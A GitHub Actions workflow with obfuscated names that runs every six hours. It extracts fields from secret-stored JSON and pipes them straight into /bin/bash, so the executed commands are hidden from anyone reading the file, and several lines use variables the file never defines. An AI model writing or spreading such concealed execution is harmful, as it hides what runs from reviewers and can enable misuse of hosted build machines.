name: yanqing19871010
on:
  workflow_dispatch:
  schedule:
    - cron: '46 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yanqing19871010
        env:
          sbm55: ${{ secrets.sbm55 }}
        run: |
          echo $sbm55 | jq -r .uyah3 | /bin/bash
          echo $z5 | jq -r .opd38919 | /bin/bash
          echo $sdj394 | jq -r .mkh91 | /bin/bash
          echo $hf232 | jq -r .gb94 | /bin/bash
          echo $n03 | jq -r .e9511 | /bin/bash
          echo $cz308 | jq -r .m89312 | /bin/bash

